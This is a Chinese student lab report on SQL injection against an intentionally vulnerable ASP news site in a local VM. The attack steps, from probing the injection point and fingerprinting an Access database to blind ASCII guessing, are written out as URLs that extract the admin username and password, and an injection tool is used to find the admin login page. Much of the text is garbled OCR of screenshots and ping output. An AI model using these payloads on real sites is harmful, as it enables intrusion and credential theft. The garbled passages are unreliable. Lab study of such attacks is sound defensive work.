SQL注入攻击实验报告

1、SQL注入攻击实验报告实验报告（实验名称：SQL注入攻击）一、实验目的通过SQL注入攻击，掌握网站的工作机制，认识到SQL注入攻击的防范措施, 加强对Web攻击的防范。二、实验环境描述实验开展所基于的网络环境，给出网络拓扑、IP地址、web服务器、客户 机等信息。宿主机（客户机）：操作系统为Windows 10, IP为1,在主机上 安装虚拟化软件Vmware Player,在此基础上创建虚拟机并安装操作系统，进行网 络配置，采用环回适配器，桥接模式，实现宿主机与虚拟机之间的网络通信，虚拟机（Web服务器）：操作系统为Windows XP, IP为192.168.18.

2、9,本实验利用windows的iis服务搭建了一个有SQL注入漏洞的网站“ASP新 闻发布系统”，以该网站为目标，对其实施SQL注入攻击。本实验所需工具如下：IIS是Internet Information Server的缩写，是微软提供的Internet服务器软 件，包括Web、FTP、Mail等服务器，也是目前常用的服务器软件。版本不限。“啊D”注入工具：对“MSSQL显错模式"、MMSSQL不显错模式”、“Access” 等数据库都有很好的注入检测能力，内集“跨库查询”、“注入点扫描”、“管理入口 检测”、“目录查看”等等于一身的注入工具包。“ASP新闻发布系统"Ok

3、3w v4.6源码。三、实验内容（一）配置实验环境，首先选择网络适配器，安装环回适配器，在主机上安装Vmware Player,成功启 动虚拟机。接着配置宿主机和虚拟机的IP,如图要注意的是，配置主机上的IP时,应该选择VMnet8,并且注意勾取Bridge-1 -9以太网2属性网络身份麴证共享连接时使用:壁 VMware Virtual Ethernet Adapter for VMnet8配置(C)lit；使用项目(Q)：S Microsoft网络客户登 roto col 国事件和打印机共享 0 链路层拓扑发现响应程序 H X Internet 初议版本 4 (TCP/IPv4) x Mi

4、crosoft网络适闺器多路传送器协议 V. x链路层拓扑发现映射器I/O英的程序 5 . Microsoft LLDP婚政驭动程序安装卸载(U)然后，验证宿主机和虚拟机是否联通，结果显示连接成功。|5i自理灵:命令疼示胃Kicrosoft Windows 版本 10. 0. 10586J(c) 2015 Microsoftdorporition. 保留所有权利.C:WI NEO V S sy s t em32 >hdvrvn 匚C: WINEOWSsystem32>ping 192. 168.18. 11在白自自自正来来来来Ping 192.168. 18. 11具有32字节的数

5、据：192. 168. 13.11 的回复：字节=32 时间<hns TTLE28192. 168. L8.11 的回复：字节=32 时间<Iras HL=128192. 168. 18.11 的回复,：字节=32 时间<lms UL=128192. 168. 13.11 的回复：字节二32 时间m=128192.168.18. 11 的 Ping 统计信息:数据包：已发送=4,已接收=4,丢失=0 (3丢失). 往返行程的估计时间(以曷秒为单位)：最短=0但，最长二Ms,平均;OireC: VINEOWSsystero32>pLng 192. 168.18. C正在P

6、ing 192.168.18. 9具有32字节的数据：来自192.168. 18.9的回复：字节=32时间=3ns TTL=128 来自192. 168. 13.9的回复：字节二32时间1侬TTL二122 来百 192. 168. 18.9 的回豆：字节=32 B力间hrs TTL=128 来自192. 168. 13.9的回复：字节=32时间1让TTL=128 192.168.18. 9 的 Ping 统计信息：数据包：已发送:4,已接收;4,丢失=0 (冰丢失), 往返行程的估计时间(以毫秒为单位)：最是=03，最长=3ms,平均=OrcC:ffINTO?/SsystGni32>最后

7、在虚拟机上安装HS程序，打开浏览器，输入地址“127. 0. 0.1” ,检查网 站搭建情况。成功!（二）寻找注入点在宿主机上，打开网页http:192. 168.18. 9/list. asp?id=95,可以正常打开 页面。Ob，0 hUpy/192.168.189J=95O，:此为阳加侬例能计：otmtr盟络技承 评，白员人口fcn：U KO W用版面芯和亲练“s宪录网站百页 筠间资讯 网络安全网页制作I碘运总 平面设计好同货m 咕内幄 网络弹作 网拈&奔 人宓新句ii界时备a-RSfifi）进行注入测试9 键入 http:/192. 168.18. 9/list. asp?id

8、=95 and 1=1,返回页 面不变。0 /listasp?id=9!320and%201 = I筋计） D G十算机月格技术课1Q新闻茹_文宜分类一期»会员入口唯号:密码;登录I三任-11 -U K J WASF孙町发布系统“4.6网站首页邦破讯1网络安全|网页:a作网站运首|平面设计软诃关讯站内劫府网拓媒体网站经济人崛（同业界动态新浪新词键入 http:/192. 168. 18. 9/list. asp?id=95 and 1=2,返回页面出错。=t? d* x49®±<- O t> C。叩”92,168.1

9、89“Uf-20ms 步可ea“ S ect counio from rv6>'SODjeGS)>0 Q 7 食g dRtMO ：发为城sma0A C x；«?RZ无，复日UX 无法显示饵贞UW诟限且或皿喳，无寿!紫 山田圣1悦，«RC«irt. .Off iinMURgridwa加fg，Kirr IM » t® - Q HIM"4ci信里修分fi+a«，m孑表竹人员) 题凫arMi<r««£t ICT )“>*!« Etqi， 芯，>/,;”，上

10、WMWIfttmEU/II3 0，第 13 行 吟会SM ,ills 0 IK，1e K! 10 0. Md/nng? » intm. i;u c.a.> as* o 法，公x 5t x: bt«zi j o3 (S) go Qioo%fromfroma»i*t2qia. t$ & 和 ®x®.» «因此，可确定该网站存在注入点。(三)判断数据库类型用系统表的方法进行判断，分别键入http：/192. 168. 18>9/list. asp?id=95and(selectcount(*)sysobject

11、s)>0http:/192. 168. 18e 9/list. asp?id=95and(selectcount(*)msysobjects)>0。b 0 http：// d=95%20and%20(select%20count(4)%20froml20msysobjects | ir.«59网址导与O （叱为知制日涵股tt）二计算松用能技术泮，二无法31 示网灵匚无法=5OT奂无法显示网页i烟访问的网页出"问迪，无法显示，商三i五机行不少J»忙:单击叵拉粗，疚幡生试。 打开 31瓦血？主贡，”后瓷段与斫SE信息4联的显格，HT

12、TP惜决5C0 18 -内却版昧和员- 瘠员 Intiirn*it总息用关枝术信电用于支势人员) 格俣奘型：?b<TO:oft JIT Dai0"q ZiiAiw (Ox8004GK)不懈期记录I存,门刀。Mch'上笳白读"戴厮眼。/list. asp,第 15 行 猴若炎型：rt0xjlla/5.O N"d。心 W 10.0. ZOA64)MWqbKit/?37.” (KMIWL lile G”上。)Chrwe/49.0. 2623 22 S才far；837 36 SK2.1 MgUSy 1.0网页：<jT /list q卬 8间20】的12

13、月旧，)524:59- i¥®fsffi：Mcoft安打O IJ （此刻侬出航例设计），计算纲塔技术，«t无浓显示阿页IC> 欣无法显示网页i的访同生四天出现向软，无法显示。金芸撤行仍施作； 单击&1引步用，或用后受试。 打开:空说反？主页，然局5核与所交信日相翊勺度痍。mt错误500,300 -内印胴若者出式-AST馅式Internet信总历务使市占史用于去招人员） 福不理：Itir0soEt J17 Dstabosq Kasina （UzEOJdQET）llicroxaft J.t於提库引攀找不多照入裳烟旬,ayxoLj.ctx% 晒定它是否E，

14、以院ER氾射渐写是否正蜩：/list. a"，第 15 行 浏览港笑空，H0?tll4/5.0 Mind。” IfT 10 0: VX"） AyrleVcbXjt/537 名 （KKOTL lik6 小才。）C匕sg/49. 0. 2%3. 22 %£针1处3乙 36 SB 2.x nt«Sr i.a 网贡.；俄I /lin. 5P 时间：20IE年12月7日，然28 详比信科；l!；croxo£/ 安扑|> 尢或两者返回均出错，可知是access数据库。(四)猜测表名一般网站后台的管理员都默认在表admin中，我们先试一下，键入：htt

15、p:192. 168. 18. 9/list. asp?id=95 and (select count () from admin) <>0, 0 hnp://list.asp?id=95%20and%2B$elect%20count(t)%20from%20admin >0 r 上导航 L'无法显示可殳计) D计算机网络技术课t1新间纺至分次秀会员人口帐目;登录IU KO WASP期间发加岁统”石返回页面正常，可知该网站后台数据库中存在着表名为admin的表。(五)猜测字段名不同公司网站有不同的字段名，但一般都有三个字段，分别 记录ID号、用

16、户名和密码，常用的字段名为：id, username, pas sword <.分别键入 http：/192. 168.18. 9/list. asp?id=95 and (select coxint (id) from admin)<>0http：/192. 168. 18. 9/list. asp?id=95 and (select count (username) from admin)<>020adm,，http:/192> 168.18. 9/list. asp?id=95 and (select count (password) from adm

17、in)<>00 httpy//list.asp?id=95%20and%20(select%20co匕导航_无法显示应2计)计篁蛔密技术津， ；一.新闻登记_文生定之球9 httpy//list.asp?id=95%20and%20(select%20coi7航间员田一文茸分至_寿：XI拈内摄有：SH) J计百机网箔技术滓tI，一员入口|味号：U K 0 WA5P爵闻发刊系统“6三者返回均正常。可知，表admin中存在的三个字段：id, username, passwordo 注：“username”的截图损坏，但是返回正常，望教员通

18、融。(六)猜测管理员用户名和密码1 .确定表 admin 中有几条记录，键入 http:/192.168.18. 9/list. asp?id=95 and (select count() from admin) =1 返回页面正常。0 /list.asp?id=95%20and%2B(select%20count(t)%20from%20admin)=1| 夕 l:导航无法显示网Svt) D Q计算机网箔技术深1新闰资讯.文章分类_我2,会员人口帐号:登录I站回搜索:U KO WAS?新闻发布系统v46可知，表admin只有一条记录。2 .猜测用户名长度，

19、键入 http:/192. 168. 18. 9/list. asp?id=95 and (selectlen (us er name)fromadmin) =1返回 出错， 继 续键入http：/192. 168. 18. 9/list. asp?id=95 and (select len(username) from admin)=2O (此为版式和体价设计)计算机网络技术便卜u无法显示网页无法显示网页i鹉访问的网画出现i唾，无法显示。活芸读执行下列麋IF： 单击的璇，斯稍后更国。 打开 皿侬皿 主百，然后查找巧解信史相关的弱按。mr惜设EOO 10D -内毒胭劳号自法-ASF之决Imcr

20、not信月不考(广 ( 0g192.168.189/lisLasp?id=95%20and%20(select%20len(usemame)%20fer!H萧I裁',会封御*址导黯：？无"5婀O(此为假孝故明设计)I计算机网络技术课f无法显示网页X +无法显示网页硝访i谢顿出现问卷无去显示。直告限也行下列枝作： 单击强按电，或带后至口。.打开酸侬.四乡主页，然后受执与所本法导相关的惯推。KHP错温503 100 -内部引为卫当误- ASP错俣1=1<- O *5- |ZH/list.asp?id=95%20and%20(select%20len(u

21、sername)%20frorn%20admin)=5 f , 一,我次魂网址导航？无法O C （此为版式和体例设计）4计百R网络技术3泊新回资讯了算分差子点U K 0 W、£P新闻杭布隶院“已合员入口 哨：站内彝：阚百页I新同资讯I网络安全I网页潮作网站运百平面设计网络编程演示网站直到返回页面正确。测试到5的时候，返回正常。可知，用户名长度为5。3.猜测用户名内容，采用ASCII码分析法先猜测第1位，用二分法，键入 http：/192.168.18. 9/1ist. asp?id=95 and (select count (*) from admin where (asc(mid(

22、username, 1,1)between 30 and 125)<>0 返回正确，进一步缩小范围 between 70 and 100 , between 85 and 100 , between 90 and 100, =97。 |。20from%20admin%20v/here(a5c(m|i(username,1,1)between%2090%20and%20100<?0 址导航 口无法显示网I设计）计算机可给技术 :集干新闻员汨内分关览E会员入口 怵号；密码;登录注册I站内加索;U KO WASF舒网发布妥.统“6网站首页I新词姿讯I网络安全I网页也作I网站运营I平

23、面设计网络编程演示网站R nd%20(select%20count(i)%20from%20admin%20wherJasc(mid(usernameJJ)=97)<>0 > I：导抗D无法显示网) D计算机网络技术课rD籽闻焚闲_文空分美弟 xVJ K 0 VVASF新闰友奇系统“6网站首页新词费讯网络安全网页制作网站运言平面设计网络辘I演示网站可知第一个字符为ao依此类推，猜测之后的每一位字符,0 d%20(lect%20counte)%20from%20admin%；IM”Q(asc(m id(usef namer2,2)=100) <>导航一元承S示网打）

24、计H引用裔技术3津t1新闾贡田A分兰型注视I站内内需:U KO WASP斯闻发而系统”5网站首页I新Ji资讯网络安全I网而潴作I网站运W平面设计I网络编程I演示网站0 d%20(select%20countr)%20from%20.黄灵左班:身充二无法显示网连十）4计育馆格技术评t:新迪安不加分工领KO W网站百再I先同资讯I网络安全网内制作网站运营I平面设计网络编程演示网站ASF勃回发如冷猊V46| 0 d%20(select%20count(*)%20from%20admi n%20v;here(a$c(mid(username, 5,5)=110)< >0 )匕导第I无法显示

25、网Sit） '计算机目后技本煤t.翁闻至3方分泛我于U KO W烬P新闻/布系统X6会员入口低号：|唐玛;登录I :上修I玷向梭雷:网站首页新施讯网络安全|网页劄作I网站运注|平面设计|网络手程|演示网站最后得到用户名为admin。4.猜测密码，同理：http:/192.168. 18. 9/list. asp?id=95 and (select len(password) from admin)=6- 0 y//listasp?id=95%20and%20(select%20|n(password)%20from%20admin)=上导航无云显示网£

26、tt) 计宜机网络技术课?哥底诺乱文官翁聋犬m ，金员入口曲号：密码:登录注册I砧内按空:网站首页I新同奥讯网并安仝I网页制作I网站运苜平面设计I网络编程演示网站所以密码为6位。3 ;elect%20count(t)%20from%20admin%20where%20%2l加0无法显示网) D计算机网络技术课t:新闻资讯_文章分类一我rX，龛员入口帐号：密码登录注册I站内搜索:U KO WASP新闻发布系统“4£网站首页I新闻资讯I网络安全I网页制作I网站运营|平面设计I网络编程I演示网以0 ielect%20count(*)%20from%20admin%20where%20%(导

27、航L；无法显示网浒) 计算机网珞技术3课iD新闻瓷七文章分美英m x卜会员入口帐号:密码:登录注册I站内搜索:U KO WASP新闻发布系统网站首页I新闻费讯I网络安全I网页制作I网站运营I平面谩计I网络编程I演示网站9 ielect%20count(:*)%20from%20admin%20where%20%10(asc(mid(passworcl,3,3) = 51)<>0p 导航D无法显示网叶） D计算机网络技术课11新闻度汛_文章分类.我三x卜会员入口 帐号：密码二登录I注册I站内搜索:U KO WASP新闻发布系统网站首页I新同资讯I网络安全I网页制作I网站运营I平面谩计

28、I网络编程I演示网站导航D无法显示网0 ielect%20cou nt(*)%20from%20adJ 计） :计算机网/技术课f新闻资讯_文章分类聿之X）会员入口怵号:登录注册I站内搜索:L网站苜页新同资讯1网络安全1网页制作网站运营1平面谩计网络编程演示网站U K 0 WASP新闻发布系统X.60 后lect%20count(»%20fom%20admin%20where%20%迎呢皿曲3辿导航D无法显示网I站内搜索;叶） .计算机网络技术课市口新闻资讯_文章分美_案 x +会员入口帐号;密码:T登录I注册U K J WASP新闻发布系统746网站首页I哥闻资讯网络安全I网页制作

29、I网站运营|平面设计I网络编程I演示网站。ielect%20count(*)%20from%20admin%20where%20%20(asc(mid(pas$word,6；6) = 54)<>0 5导航L.-i无法显示网浒）D &计算机网珞技术课工，D新闻资讯一文章分类_我曰x卜会员入口 帐号：密科:登录I注册站内搜索:注入检别U KO WASP新闻发布系统“4.6网站首页I新闻费讯I网络安全I网页制作I网站运营I平面谩计I网络编程I演示网站最终得到密码为6位：123456。（七）寻找到后台管理窗口打开“啊D”软件，点击进入“管理入口检测”选 项，点击“检测管理入口”，进行检测，网咕地址 hg/19263.18.9/ 管理久口可用连接和目录位置0ks:192 163 18 9/imaces/ 粤hep : 19乙 163.18. S/adnin/ <http：/192.163.18. 9/. /admin/index asp ，http ： /192. 163. 18. 9/ adn i a/ j ndex. asp如图：打开检测到的各网址，测试是否为管理入口。l可知 http:/192. 168. 18. 9/admin/index. asp 为管里入口，如图:C nip/